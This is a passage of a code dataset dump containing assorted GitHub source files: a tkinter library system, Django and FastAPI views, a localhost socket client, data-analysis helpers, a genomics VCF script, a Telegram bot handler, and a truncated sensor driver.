Title\nBooktitle3.grid(row = 11, column = 0)\n\nBookReturnTodayDate = Label(root, text = \"Please enter Today's Date: \")\nBookReturnTodayDate.grid(row = 12, column = 0)\n\nReturnDate = Entry(root,width = 50,bg = 'black', fg='white', borderwidth = 5) #Today's Date\nReturnDate.grid(row = 13, column = 0)\n\nBookReturnSerialNo = Label(root, text = \"Please enter Serial number of book: \")\nBookReturnSerialNo.grid(row = 14, column = 0)\n\nBookSerial2 = Entry(root,width = 50,bg = 'black', fg='white', borderwidth = 5) #Serial number of book taken\nBookSerial2.grid(row = 15, column = 0)\n\nBookReturnCheckoutDate = Label(root, text = \"Please enter checkout date: \")\nBookReturnCheckoutDate.grid(row = 16, column = 0)\n\nCheckoutDate2 = Entry(root,width = 50,bg = 'black', fg='white', borderwidth = 5) #Checkout Date\nCheckoutDate2.grid(row = 17, column = 0)\n\n\n#below is the book return function as explained in the bookreturn.py file\ndef book_return():\n \n if Returnresponse.get() == 'Yes':\n for i in range(0,11):\n if MemberID2.get() in data_lines[i][5]:\n \n my_listbox.insert(END, data_lines[i])\n \n my_listbox.insert(END, \"Valid\")\n \n \n\n \n \n if BookSerial2.get() in mylist3 and ISBN2.get() in data_lines[i][1]:\n if BookSerial2.get() =='1':\n data_lines[1][5]= '0'\n with open('database.txt',mode = 'w') as csvmy_FILE:\n writerow = csv.writer(csvmy_FILE, delimiter =',')\n writerow.writerows(data_lines)\n csvmy_FILE.close\n \n if BookSerial2.get() =='2':\n data_lines[2][5]= '0'\n with open('database.txt',mode = 'w') as csvmy_FILE:\n writerow = csv.writer(csvmy_FILE, delimiter =',')\n writerow.writerows(data_lines)\n csvmy_FILE.close\n \n if BookSerial2.get() =='3':\n data_lines[3][5]= '0'\n with open('database.txt',mode = 'w') as csvmy_FILE:\n writerow = csv.writer(csvmy_FILE, delimiter =',')\n writerow.writerows(data_lines)\n csvmy_FILE.close\n \n if BookSerial2.get() =='4':\n data_lines[4][5]= '0'\n with open('database.txt',mode = 'w') as csvmy_FILE:\n writerow = csv.writer(csvmy_FILE, delimiter =',')\n writerow.writerows(data_lines)\n csvmy_FILE.close\n \n if BookSerial2.get() =='5':\n data_lines[5][5]= '0'\n with open('database.txt',mode = 'w') as csvmy_FILE:\n writerow = csv.writer(csvmy_FILE, delimiter =',')\n writerow.writerows(data_lines)\n csvmy_FILE.close\n \n if BookSerial2.get() =='6':\n data_lines[6][5]= '0'\n with open('database.txt',mode = 'w') as csvmy_FILE:\n writerow = csv.writer(csvmy_FILE, delimiter =',')\n writerow.writerows(data_lines)\n csvmy_FILE.close\n \n if BookSerial2.get() =='7':\n data_lines[7][5]= '0'\n with open('database.txt',mode = 'w') as csvmy_FILE:\n writerow = csv.writer(csvmy_FILE, delimiter =',')\n writerow.writerows(data_lines)\n csvmy_FILE.close\n \n if BookSerial2.get() =='8':\n data_lines[8][5]= '0'\n with open('database.txt',mode = 'w') as csvmy_FILE:\n writerow = csv.writer(csvmy_FILE, delimiter =',')\n writerow.writerows(data_lines)\n csvmy_FILE.close\n \n if BookSerial2.get() =='9':\n data_lines[9][5]= '0'\n with open('database.txt',mode = 'w') as csvmy_FILE:\n writerow = csv.writer(csvmy_FILE, delimiter =',')\n writerow.writerows(data_lines)\n csvmy_FILE.close\n \n if BookSerial2.get() =='10':\n data_lines[10][5]= '0'\n with open('database.txt',mode = 'w') as csvmy_FILE:\n writerow = csv.writer(csvmy_FILE, delimiter =',')\n writerow.writerows(data_lines)\n csvmy_FILE.close\n \n my_listbox.insert(END, \"Book returned successfully\") \n \n elif BookSerial2.get() not in mylist3:\n my_listbox.insert(END, \"Invalid!\")\n \n break\n \n with open(r'logfile.txt', 'a') as csvfile: \n newfile = csv.writer(csvfile)\n newfile.writerow([BookSerial2.get(),Booktitle3.get(),MemberID2.get(),ISBN2.get(),CheckoutDate2.get(),ReturnDate.get()])\n my_listbox.insert(END, \"Thank You! Have a great day.\")\n \n break\n else:\n my_listbox.insert(END, \"Not valid!\")\n \n else:\n my_listbox.insert(END, \"Have a good day\")\n \n \n \n \n#After all the inputs are put in the respective boxes, only then click the return button\n \nReturn_button = Button(root, text = \"Return\",padx = 5, pady = 5, command = book_return,fg='red')\nReturn_button.grid(row = 18, column = 0)\n\n\n#Below is the function for my weeding criteria, there is an obvious error where the graph is not embedded in the tkinter window, Apologies.\n\n\n\n\n \ndef book_weeding():\n plt.style.use(\"fivethirtyeight\")\nwith open('logfile.txt') as myoo_file:\n book_reader = csv.DictReader(myoo_file)\n book_counter = Counter()\n for row in book_reader:\n book_counter.update(row['Book Title'].split(';'))\nbooks = []\npopularity = []\nfor item in book_counter.most_common():\n books.append(item[0])\n popularity.append(item[1])\nbooks.reverse()\npopularity.reverse()\n \nplt.barh(books, popularity) \nplt.title(\"Book Weeding\")\nplt.xlabel(\"Number of times withdrawn\")\nplt.ylabel(\"BOOK TITLE\")\nplt.tight_layout()\nplt.show()\n\n\n\nWeeding_button = Button(root, text = \"Weeding\",padx = 5, pady = 5, command = book_weeding,fg='red')\nWeeding_button.grid(row = 20, column = 0)\n\nroot.configure(bg='cyan')\n\nroot.mainloop()\n\n\n# TO USE THE WINDOW, PLEASE EXIT FROM THE GRAPH FIRST\n","repo_name":"aym183/Library-System","sub_path":"menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":23567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17902226479","text":"# -*- coding: utf-8 -*-\n# @Date: 2016-11-29 20:26:06\n# @Last Modified time: 2017-01-03 15:54:21\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render_to_response\nfrom django.template.context_processors import csrf\n#\n# @method_decorator————给类视图添加装饰器\nfrom django.utils.decorators import method_decorator\n#\n\nfrom django.views.generic import ListView, View\n# from django.views.generic import TemplateView\nfrom login.common.security import create_pwd, create_session\nfrom login.forms import UserForm\nfrom login.models import SimpleUser, DownLoad\nfrom base.common.excelDownload import big_excel_download\n\n\nclass DownloadList(ListView):\n\n template_name = 'login/download_list.html'\n\n # model = DownLoad————queryset = DownLoad.objects.all()\n def get_queryset(self):\n list_d = DownLoad.objects.all()\n create_name = self.request.GET.get('create_name')\n file_name = self.request.GET.get('file_name')\n address = self.request.GET.get('address')\n if create_name:\n list_d = list_d.filter(create_name=create_name)\n if file_name:\n list_d = list_d.filter(file_name=file_name)\n if address:\n list_d = list_d.filter(address=address)\n return list_d\n\n # dispatch————类视图接受装饰器\n @method_decorator(csrf_protect)\n def dispatch(self, *args, **kwargs):\n return super(DownloadList, self).dispatch(*args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super(DownloadList, self).get_context_data(**kwargs)\n # 在上下文数据中添加file_name集合\n # annotate = DownLoad.objects.values('file_name').annotate()\n # context['annotate'] = annotate\n return context\n\n # def get_object(self, queryset=None):\n # return get_object_or_404(Product, key=self.kwargs.get('name'))\n\n\n# excel导出视图\ndef report_excel(request):\n # 文件名必须unicode\n # 编码一律使用unicode,避免出错\n xlsxname = u\"下载信息表\"\n titles = [u\"文件名\", u\"创建人\", u\"下载地址\"]\n # 调用DownloadList的get_queryset方法\n d = DownloadList()\n d.__init__(request=request)\n data = d.get_queryset()\n data_fields = []\n for i in data:\n row = [i.file_name, i.create_name, i.address]\n data_fields.append(row)\n # response = excel_download(xlsxname, titles, data_fields)\n response = big_excel_download(xlsxname, titles, data_fields)\n return response\n\n\n# 基于类的表单处理视图\nclass AddDownload(View):\n\n @method_decorator(csrf_protect)\n def dispatch(self, request, *args, **kwargs):\n return super(AddDownload, self).dispatch(request, *args, **kwargs)\n\n def post(self, request, *args, **kwargs):\n data = None\n # request.REQUEST————等于request.GET+request.POST,GET、POST更明确\n file_name = request.POST.get('file_name')\n create_name = request.POST.get('create_name')\n address = request.POST.get('address')\n if not file_name:\n data = \"文件名添必填\"\n if not create_name:\n data = \"添加人必填\"\n if not address:\n data = \"文件链接必填\"\n if not data:\n d = DownLoad(file_name=file_name,\n create_name=create_name, address=address)\n # save()————保存到数据库\n d.save()\n # 获取增加的这条数据的ID\n # id = d.id\n data = \"ok\"\n return HttpResponse(data)\n\n\n# from django.shortcuts import get_object_or_404\n# publisher = get_object_or_404(DownLoad, name__iexact=self.args[0])\n","repo_name":"cash2one/web-3","sub_path":"py_web_django/乱七八糟/azure/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"26745714534","text":"#coding-utf-8\nimport socket\nimport msgpack\n\ndef rodar_rotinas():\n\n host='localhost'\n\n mysock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n addr=(host, 9898)\n mysock.connect(addr)\n\n try:\n # msg=b\"ola\\n\"\n msg = execution()\n mysock.sendall(msg)\n except socket.errno as e:\n print(\"Socket error \", e)\n finally:\n while True:\n msg = mysock.recv(1024)\n if not msg:\n break\n fallback(msgpack.unpackb(msg))\n mysock.close()\n\n\ndef execution():\n return msgpack.packb(['execute_test()', 'send_sms()', 'send_email()'])\n # fallback('ok')\n\ndef fallback(fallback):\n print(fallback)\n\n\nrodar_rotinas()\n","repo_name":"kauehmoreno/rpc","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"31620492276","text":"# Erica Lei\n# CS251 Spring 2017\n# Project 4 Integrating Data and Viewing\n# due March 12\n\nimport data\nimport sys\nimport numpy as np\n\n\n# returns a list of 2-element lists with min and max for each col\ndef data_range(headers, data):\n\tselected = data.getNumCol(headers)\n\tmins = selected.min(0)\n\tminlist = [[mins[0,0]],[mins[0,1]]]\n\n\tmaxs = selected.max(0)\n\tmaxlist = [[maxs[0,0]],[maxs[0,1]]]\n\n\tminnmax = np.hstack((minlist, maxlist))\n\treturn minnmax\n\n# returns a list of the mean values for each column\ndef mean(headers, data):\n\n\treturn data.getNumCol(headers).mean(0)\n\n# returns a list of the standard deviation for each specified column\ndef stdev(headers, data):\n\tselected = data.getNumCol(headers)\n\tsdlist = []\n\tfor i in range(selected.shape[1]):\n\t\tcol = selected[:,i]\n\t\t\n\t\tsdlist.append(np.std(col))\n\treturn sdlist\n\n# returns a matrix with each column normalized\n# so its minimum value is mapped to 0 and \n# its maximum value is mapped to 1. (x-min)/(max-min)\ndef normalize_columns_separately(headers, data):\n\tselected = data.getNumCol(headers)\n\tminval = np.min(selected, axis = 0)\n\tmaxval = np.max(selected, axis = 1)\n\textent = maxval-minval\n\tresult= (selected-minval)/extent\n\n\treturn result\n\n# returns a matrix with each entry normalized \n# so that the minimum value (of all the data in this set of columns) \n# is mapped to 0 and its maximum value is mapped to 1.\ndef normalize_columns_together(headers, data):\n\tselected = data.getNumCol(headers)\n\textent = selected.max() - selected.min()\n\tr = (selected - selected.min())/extent\n\treturn r\n\n# returns the sums of each col\ndef sumCol(headers,data):\n\tselected = data.getNumCol(headers)\n\treturn np.sum(selected,axis = 0)\n\n# retuns a number, sum of all elements\ndef sumTotal(headers,data):\n\tselected = data.getNumCol(headers)\n\treturn np.sum(selected)\n\n# returns a list of 25 percent of the range of each col\ndef perc25(headers,data):\n\tselected = data.getNumCol(headers)\n\tpc = np.percentile(selected, 25, axis=0)\n\treturn pc\n\n","repo_name":"EricaLei98/CS251-Data-Analysis-and-Visualization","sub_path":"Lab4/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":1979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"37057210923","text":"\"\"\"\nDatabase Model interface for the COMP249 Web Application assignment\n\n@author: steve cassidy\n\"\"\"\n\nimport datetime\n\n\ndef position_list(db, limit=10):\n \"\"\"Return a list of positions ordered by date\n db is a database connection\n return at most limit positions (default 10)\n\n Returns a list of tuples (id, timestamp, owner, title, location, company, description)\n \"\"\"\n\n \"\"\"Get the positions data from database\"\"\"\n cursor = db.cursor()\n cursor.execute(\"SELECT * from positions order by timestamp DESC\")\n result = cursor.fetchall()\n\n final_data = []\n\n \"\"\"Reformatting the job description to display only first 100 characters and adding Read More link\"\"\"\n for x in result:\n lst = list(x)\n desc = lst[6]\n desc = str(desc[0:100])\n desc = desc+\" ... Read More\"\n lst[6] = desc\n x = tuple(lst)\n\n final_data.append(x)\n\n my_result = []\n\n \"\"\"If limit is greater than records then return current list\"\"\"\n if limit > len(final_data):\n return result\n\n \"\"\"If limit is less than records then return only required records\"\"\"\n for count in range(0, limit):\n my_result.append(final_data[count])\n\n return my_result\n\n\ndef position_get(db, id):\n \"\"\"Return the details of the position with the given id\n or None if there is no position with this id\n\n Returns a tuple (id, timestamp, owner, title, location, company, description)\n\n \"\"\"\n \"\"\"Get the positions data from database\"\"\"\n position_data=[]\n cursor = db.cursor()\n cursor.execute(\"SELECT * from positions where id =(?)\", (id,))\n myresult = cursor.fetchall();\n\n \"\"\"Return required details of position\"\"\"\n for record in myresult:\n for data in record:\n position_data.append(data)\n\n \"\"\"Return None if no records are found\"\"\"\n if(len(position_data)==0):\n return None\n return position_data\n\n\ndef position_add(db, usernick, title, location, company, description):\n \"\"\"Add a new post to the database.\n The date of the post will be the current time and date.\n Only add the record if usernick matches an existing user\n\n Return True if the record was added, False if not.\"\"\"\n\n \"\"\"Get the users data from database\"\"\"\n cursor = db.cursor()\n cursor.execute(\"SELECT * FROM users where nick=(?)\", (usernick,))\n result = cursor.fetchall()\n\n \"\"\"Check if user exist if yes insert new position into the database and return true else return false\"\"\"\n if len(result) == 0:\n return False\n else:\n cursor.execute(\"INSERT INTO positions(timestamp,owner,title,location,company,description) VALUES(?,?,?,?,?,?)\",\n (str(datetime.datetime.now()),usernick,title,location,company,description,))\n\n db.commit()\n return True\n","repo_name":"palash-tayade/WebTechnology-Project","sub_path":"Assignment3_Level3/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":2831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"70218103306","text":"# The Quick Sort Algorithm\n\narr = [3, -2, -1, 0, 2, 4, 1]\n\n# sorted in ascending order\n# [-2, -1, 0, 1, 2, 3, 4]\n\n\ndef qs(arr, l, r):\n if l >= r:\n return\n\n pivot = arr[r]\n i = l\n j = r - 1\n\n while i <= j:\n if arr[i] <= pivot:\n i += 1\n elif arr[j] > pivot:\n j -= 1\n else:\n arr[i], arr[j] = arr[j], arr[i]\n i += 1\n j -= 1\n\n arr[i], arr[r] = arr[r], arr[i]\n\n qs(arr, l, i - 1)\n qs(arr, i + 1, r)\n","repo_name":"j0rdiC/lang","sub_path":"data_structures_and_algorithms/algorithms/quicksort.py","file_name":"quicksort.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"33491443674","text":"class RBTree:\n\n def __init__(self):\n self.nil = RBTreeNode(0)\n self.root = self.nil\n\nclass RBTreeNode:\n\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n self.parent = None\n self.color = 'black'\n","repo_name":"XiongQiuQiu/CLRS","sub_path":"C13/rb-tree.py","file_name":"rb-tree.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"22837122934","text":"from src.models import Post\nfrom pydantic import UUID4\nfrom sqlalchemy.ext.asyncio import AsyncSession\nfrom collections.abc import Sequence\nfrom sqlalchemy import select as sa_select\nfrom sqlalchemy import update as sa_update\nfrom ..schemas.post import PostSchemaCreate, PostSchemaUpdate\n\n\nasync def get_all(db: AsyncSession, bound: int | None = None) -> Sequence[Post]:\n return (await db.execute(sa_select(Post).limit(bound))).scalars().all()\n\n\nasync def get_by_id(db: AsyncSession, post_id: UUID4) -> Post | None:\n return await db.get(Post, post_id)\n\n\nasync def create(db: AsyncSession, post: PostSchemaCreate, owner_id: UUID4) -> Post:\n db_post = Post(title=post.title, text=post.text, owner_id=owner_id)\n db.add(db_post)\n await db.commit()\n await db.refresh(db_post)\n return db_post\n\n\nasync def update(db: AsyncSession, payload: PostSchemaUpdate, post: Post) -> Post:\n update_data = payload.dict(exclude_none=True, exclude_unset=True)\n query = sa_update(Post).where(Post.id == post.id).values(update_data)\n await db.execute(query)\n await db.commit()\n await db.refresh(post)\n return post\n\n\nasync def delete(db: AsyncSession, post: Post) -> None:\n await db.delete(post)\n await db.commit()\n","repo_name":"ramazanix/my_app","sub_path":"src/services/post.py","file_name":"post.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"40453198649","text":"import argparse\nimport logging\nimport pandas as pd\nimport pysam\nimport random\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef write_data_information_to_file(input_data, outfile, ref_sequence, header):\n data_grouped = [group for key, group in input_data.groupby(\"CHROM\")]\n in_fasta = pysam.FastaFile(ref_sequence)\n random.seed(14038)\n\n for line in header:\n if line.startswith(\"#CHROM\"):\n outfile.write(\"#CHROM\\tPOS\\tID\\tREF\\tALT\\tQUAL\\tFILTER\\tINFO\\n\")\n else:\n outfile.write(line)\n\n for group in data_grouped:\n if \"chr\" in str(group[\"CHROM\"].iloc[0]):\n chrom_id = str(group[\"CHROM\"].iloc[0])\n else:\n chrom_id = \"chr\" + str(group[\"CHROM\"].iloc[0])\n\n for row in group.itertuples():\n # make sure that the window starts at the beginning of the reference sequence\n window_start = max(int(row.POS) - 3, 1)\n\n # make sure that the window won't exceed the reference sequence length\n window_end = min(int(row.POS) + len(row.REF) + 2, in_fasta.get_reference_length(chrom_id))\n extended_ref_seq = in_fasta.fetch(chrom_id, window_start, window_end)\n\n for i in range(abs(window_end-window_start)):\n alt_variant = \"\"\n if (extended_ref_seq[i] == \"A\") or (extended_ref_seq[i] == \"T\"):\n alt_variant = random.choice([\"G\", \"C\"])\n elif (extended_ref_seq[i] == \"G\") or (extended_ref_seq[i] == \"C\"):\n alt_variant = random.choice([\"A\", \"T\"])\n elif (extended_ref_seq[i] == \"N\"):\n logger.warn(\"Reference base was skipped because it was 'N'!\")\n continue\n else:\n logger.error(\"The given reference sequence seems to be corrupted!\")\n\n outfile.write(str(row.CHROM).strip() + \"\\t\" + str(window_start + i + 1).strip() + \"\\t\" + \".\" + \"\\t\" + str(extended_ref_seq[i]).strip() + \"\\t\" + str(alt_variant).strip() + \"\\t\" + \".\" + \"\\t\" + \".\" + \"\\t\" + str(row.INFO).strip() + \"\\n\")\n\n\ndef import_vcf_data(in_data):\n header_line = \"\"\n comment_lines = []\n\n with open(in_data, \"r\") as input_vcf:\n # extract header from vcf file\n for line in input_vcf:\n if line.strip().startswith(\"##\"):\n comment_lines.append(line)\n if line.strip().startswith(\"#CHROM\"):\n header_line = line.strip()\n comment_lines.append(line)\n break # now the variant entries are coming\n else:\n continue\n\n if header_line == \"\":\n logger.error(\"The VCF seems to be corrupted, missing header line!\")\n\n # reset file pointer to begin reading at the beginning (is done by closing the file before reading again)\n\n data = pd.read_csv(in_data, names=header_line.split(\"\\t\"), sep=\"\\t\", comment=\"#\", low_memory=False)\n data.fillna(\".\", inplace=True)\n data = data.rename(columns={\"#CHROM\": \"CHROM\"})\n\n return data, comment_lines\n\n\ndef convert_indel_vcf_to_expanded_indel_vcf(in_data, out_data, ref_folder):\n input_data, header = import_vcf_data(in_data)\n with open(out_data, \"w\", newline=\"\") as outfile:\n write_data_information_to_file(input_data, outfile, ref_folder, header)\n\n\nif __name__==\"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--in_data\", type=str, dest=\"in_data\", metavar=\"input.csv\", required=True, help=\"InDel VCF file to expand\\n\")\n parser.add_argument(\"--out_data\", type=str, dest=\"out_data\", metavar=\"output.vcf\", required=True, help=\"Output VCF file\\n\")\n parser.add_argument(\"--ref_path\", type=str, dest=\"ref_path\", metavar=\"/path/to/hg19/Homo_sapiens.GRCh37.dna.chromosome.[ID].fa\", required=True, help=\"Path were the reference genome is found.\\n\")\n args = parser.parse_args()\n\n ref_folder = args.ref_path\n convert_indel_vcf_to_expanded_indel_vcf(args.in_data, args.out_data, args.ref_path)\n","repo_name":"imgag/aiDIVA","sub_path":"aidiva/helper_modules/convert_indels_to_snps_and_create_vcf.py","file_name":"convert_indels_to_snps_and_create_vcf.py","file_ext":"py","file_size_in_byte":3985,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"10702861201","text":"from xml.sax.xmlreader import Locator\nfrom django.http import HttpResponseRedirect, JsonResponse\nfrom django.shortcuts import get_object_or_404, redirect, render, get_list_or_404\nfrom django.urls import reverse\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.admin.views.decorators import staff_member_required\n\nfrom .models import *\nfrom .forms import *\n\nfrom utils import *\n\nimport logging\nlogger = logging.getLogger(__name__)\n\n# Create your views here.\n\ndef index(req):\n\n\n context = {\n 'events': Event.objects.all(),\n 'sub_categories': Sub_category.objects.all(),\n 'categories': Category.objects.all(),\n }\n return render(req, 'events/index.html', context)\n\ndef register(req):\n logger.info('Loading register.html')\n if req.method == \"POST\":\n logger.info(f'Received POST request: {req.POST}')\n form = UserForm(req.POST)\n \n if form.is_valid():\n user = form.save()\n login(req, user)\n logger.info(f\"Registration successful\")\n logger.info('Redirecting to profile page')\n return HttpResponseRedirect(reverse('profile'))\n \n else:\n logger.error(f\"Unsuccessful registration. Invalid information.\")\n return render(req, 'events/register.html', {'message':'Invalid Credentials!'})\n\n else:\n form = UserForm()\n\n context = {\n 'form':form\n }\n\n return render(req, 'events/register.html', context)\n\ndef login_view(req):\n logger.info('Loading login.html')\n if req.method == 'POST':\n logger.info(f'Received POST request: {req.POST}')\n username = req.POST['username']\n password = req.POST['password']\n user = authenticate(req, username=username, password= password)\n\n if user is not None:\n login(req, user)\n logger.info(f\"Login successful\")\n logger.info('Redirecting to profile page')\n return HttpResponseRedirect(reverse('profile'))\n else:\n\n logger.error(f\"Unsuccessful registration. Invalid information.\")\n return render(req, 'events/login.html', {'message':'Invalid Credentials!'})\n\n else:\n return render(req, 'events/login.html')\n\ndef logout_view(req):\n logger.info('Logout initiated')\n logout(req)\n logger.info('Logged out succesfully')\n logger.info('Redirecting to main page')\n return HttpResponseRedirect(reverse(index))\n\n@staff_member_required\ndef edit(req):\n\n logger.info('Loading edit.html')\n if req.method == 'POST':\n logger.info(f'Received POST request: {req.POST}')\n form1 = EventForm(req.POST, req.FILES, prefix='form1')\n form2 = CategoryForm(req.POST, prefix='form2')\n form3 = SubCategoryForm(req.POST, prefix='form3')\n form4 = LocationForm(req.POST, prefix='form4')\n\n if form1.is_valid():\n logger.info('form1 saved')\n form1.save()\n if form2.is_valid():\n logger.info('form2 saved')\n form2.save()\n if form3.is_valid():\n logger.info('form3 saved')\n form3.save()\n if form4.is_valid():\n logger.info('form4 saved')\n form4.save()\n\n logger.info('Redirecting to main page')\n return HttpResponseRedirect(reverse('index'))\n\n else:\n form1 = EventForm(prefix='form1')\n form2 = CategoryForm(prefix='form2')\n form3 = SubCategoryForm(prefix='form3')\n form4 = LocationForm(prefix='form4') \n\n context = {\n 'form1' : form1,\n 'form2' : form2,\n 'form3' : form3,\n 'form4' : form4, \n 'events': Event.objects.all(),\n 'sub_categories': Sub_category.objects.all(),\n 'locations': Location.objects.all(),\n }\n\n \n return render(req, 'events/edit.html', context)\n\n@login_required\ndef profile(req):\n logger.info('Loading profile.html')\n if req.method == 'POST':\n logger.info(f'Received POST request: {req.POST}')\n user_form = UserForm(req.POST, instance=req.user)\n profile_form = ProfileForm(req.POST, instance=req.user.profile)\n if user_form.is_valid() and profile_form.is_valid():\n user_form.save()\n profile_form.save()\n return HttpResponseRedirect(reverse(profile))\n logger.error('Error in updating the profile')\n else:\n user_form = UserForm(instance=req.user)\n profile_form = ProfileForm(instance=req.user.profile)\n\n currentUserProfile = Profile.objects.filter(pk = req.user.id)\n\n context = {\n 'user_form': user_form,\n 'profile_form': profile_form,\n 'profile': Profile.objects.get(user=req.user),\n 'events':currentUserProfile[0].events.all()\n }\n\n return render(req, 'events/profile.html', context)\n\n@login_required\ndef book_view(req, pk):\n \n event = get_object_or_404(Event, id=req.POST.get('event_id'))\n booked = False\n \n if event.location.capacity > event.users.count():\n\n if event.users.filter(id=req.user.profile.id).exists():\n event.users.remove(req.user.profile)\n booked = False\n else:\n event.users.add(req.user.profile)\n booked = True\n\n else:\n HttpResponseRedirect(reverse(index))\n\n return HttpResponseRedirect(reverse('profile'))\n\n@login_required\ndef like_view(req, pk):\n \n event = get_object_or_404(Event, id=req.POST.get('event_id'))\n liked = False\n\n if event.likes.filter(id=req.user.id).exists():\n event.likes.remove(req.user)\n liked = False\n else:\n event.likes.add(req.user)\n liked = True\n\n return HttpResponseRedirect(reverse('index'))\n\n@staff_member_required\ndef edit_event(req, pk):\n\n event = Event.objects.get(id=pk)\n\n if req.method == 'POST':\n eventForm = EventForm(req.POST, instance=event)\n \n if eventForm.is_valid():\n eventForm.save()\n\n return redirect('index')\n \n else:\n eventForm = EventForm(instance=event)\n\n context = {\n 'eventForm' : eventForm,\n }\n\n return render(req, 'events/edit.html', context)\n\n@staff_member_required\ndef edit_sub_category(req, pk):\n\n sub_category = Sub_category.objects.get(id=pk)\n\n if req.method == 'POST':\n subCategoryForm = SubCategoryForm(req.POST, instance=sub_category)\n\n if subCategoryForm.is_valid():\n subCategoryForm.save()\n\n return redirect('index')\n \n else:\n subCategoryForm = SubCategoryForm(instance=sub_category)\n\n\n context = {\n 'subCategoryForm' : subCategoryForm,\n }\n\n return render(req, 'events/edit.html', context)\n\n@staff_member_required\ndef edit_location(req, pk):\n\n location = Location.objects.get(id=pk)\n\n if req.method == 'POST':\n locationForm = LocationForm(req.POST, instance=location)\n\n if locationForm.is_valid():\n locationForm.save()\n\n\n return redirect('index')\n \n else:\n locationForm = LocationForm(instance=location)\n\n\n context = {\n 'locationForm' : locationForm,\n }\n\n return render(req, 'events/edit.html', context)\n\n@staff_member_required\ndef delete_event(req, pk):\n\n event = Event.objects.get(id=pk)\n event.delete()\n\n return redirect('edit')\n\n@staff_member_required\ndef delete_sub_category(req, pk):\n\n sub_category = Sub_category.objects.get(id=pk)\n sub_category.delete()\n\n return redirect('edit')\n\n@staff_member_required\ndef delete_location(req, pk):\n\n location = Location.objects.get(id=pk)\n location.delete()\n\n return redirect('edit')\n","repo_name":"JasonGri/Event-Bookings","sub_path":"EventBookings/events/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"72736874186","text":"from telegram import Update, InlineKeyboardMarkup, InlineKeyboardButton\nfrom telegram.ext import CallbackQueryHandler\n\nfrom django.utils.translation import gettext as _\n\nfrom .l10n_context import L10nContext\n\nfrom summary.tasks import create_image_variation\n\n\nasync def create_dalle_variation(update: Update, context: L10nContext):\n await update.callback_query.answer()\n\n try:\n file_id = int(context.match.group(1))\n except (ValueError, AttributeError):\n return\n\n result = await create_image_variation(\n bot_token=context.bot.token,\n user_id=update.effective_user.id,\n file_id=file_id,\n chat_id=update.effective_message.chat_id,\n message_id=update.effective_message.id,\n )\n\n if not result['url']:\n return\n\n await update.effective_message.reply_photo(\n photo=result['url'],\n caption=result['db_image'].prompt,\n reply_markup=InlineKeyboardMarkup.from_button(\n InlineKeyboardButton(\n text=_('Try another variation'),\n callback_data=f'create_variation_{result[\"db_image\"].id}',\n ),\n ),\n )\n\n\nhandler = CallbackQueryHandler(pattern=r'create_variation_(\\d+)', callback=create_dalle_variation)\n","repo_name":"aq1/openai-bot","sub_path":"bot/tg/handlers/create_dalle_variation_handler.py","file_name":"create_dalle_variation_handler.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"39719186504","text":"\"\"\"\nGiven an integer array B of size N.\nYou need to find the Ath largest element in the subarray [1 to i] where i varies from 1 to N. In other words, find the Ath largest element in the sub-arrays [1 : 1], [1 : 2], [1 : 3], ...., [1 : N].\nNOTE: If any subarray [1 : i] has less than A elements then output array should be -1 at the ith index.\n\"\"\"\nimport heapq\nclass Solution:\n def solve(self, A: int, B: list) -> list:\n n = len(B)\n heap = list()\n ans = [-1 for _ in range(n)]\n if n < A: return ans\n for v in range(A):\n heap.append(B[v])\n heapq.heapify(heap)\n ans[A - 1] = heap[0]\n\n for i in range(A, n):\n if heap[0] < B[i]:\n heapq.heapreplace(heap, B[i])\n ans[i] = heap[0]\n return ans\n\nt = Solution()\nA = 5\nB = [1, 2, 3, 4, 5, 6] \nprint(t.solve(A, B))\n","repo_name":"anurag5398/DSA-Problems","sub_path":"Heaps/AthLargest.py","file_name":"AthLargest.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"31030004907","text":"\"\"\"BME280 Driver.\"\"\"\n# original from Pimoroni. Modified TheHWcave \nfrom i2cdevice import Device, Register, BitField, _int_to_bytes\nfrom i2cdevice.adapter import LookupAdapter, Adapter\nimport struct\nimport time\n\n\n__version__ = '9.9.9.9' #TheHWcave: Bump from 0.0.1\n\n\nCHIP_ID = 0x60\nI2C_ADDRESS_GND = 0x76\nI2C_ADDRESS_VCC = 0x77\n\n\nclass S8Adapter(Adapter):\n\t\"\"\"Convert unsigned 8bit integer to signed.\"\"\"\n\n\tdef _decode(self, value):\n\t\tif value & (1 